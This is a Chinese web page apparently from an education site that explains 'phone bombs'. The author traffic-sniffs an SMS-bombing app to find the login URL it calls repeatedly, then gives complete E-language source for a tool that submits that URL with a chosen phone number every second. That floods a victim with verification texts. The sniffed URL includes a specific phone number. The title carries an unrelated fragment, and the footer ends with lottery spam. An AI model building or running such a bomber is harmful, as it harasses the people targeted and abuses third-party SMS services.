[讓手機炸彈不在神秘] 滿桌子啤酒自己喝圖片

來源:手機 發布時間:2018-09-08 04:04:25 點擊:
下載一個手機炸彈軟件
隨便輸入一個手機號碼然后選擇次數之類的
利用WSockExpert_Cn.exe監聽手機炸彈
得出/pages/user-newlogin.asp?number=13088170991
原來手機炸彈只不過是一個URL循環提交的工具而已
按照他的思路我也寫了一個類的手機炸彈工具
開發語言:易語言
源代碼如下:
.支持庫 HtmlView
.支持庫 iext

.程序集 窗口程序集1

.子程序 _按鈕1_被單擊

超文本瀏覽框1.地址 = “/pages/user-newlogin.asp?number=” + 編輯框1.內容
超級列表框1.插入表項 (, “message sannding successful!”, , , , )
時鐘1.時鐘周期 = 1000

.子程序 __啟動窗口_創建完畢

按鈕1.獲取焦點 ()

.子程序 _按鈕2_被單擊

按鈕1.禁止 = 真
時鐘1.時鐘周期 = 1215752191

.子程序 _按鈕3_被單擊

按鈕1.禁止 = 假

.子程序 _時鐘1_周期事件

_按鈕1_被單擊 ()


推薦訪問:炸彈 不在 神秘 讓手機炸彈不在神秘 手機骷髏炸彈 手機炸彈軟件
上一篇:如何在弱光環境中拍攝運動物體|弱光環境
下一篇:最后一頁

Copyright @ 2013 - 2018 易啊教育網_免費學習教育網_自學.勵志.成長! All Rights Reserved

易啊教育網_免費學習教育網_自學.勵志.成長! 版權所有 湘ICP備11019447號-75

非会员公开一码中特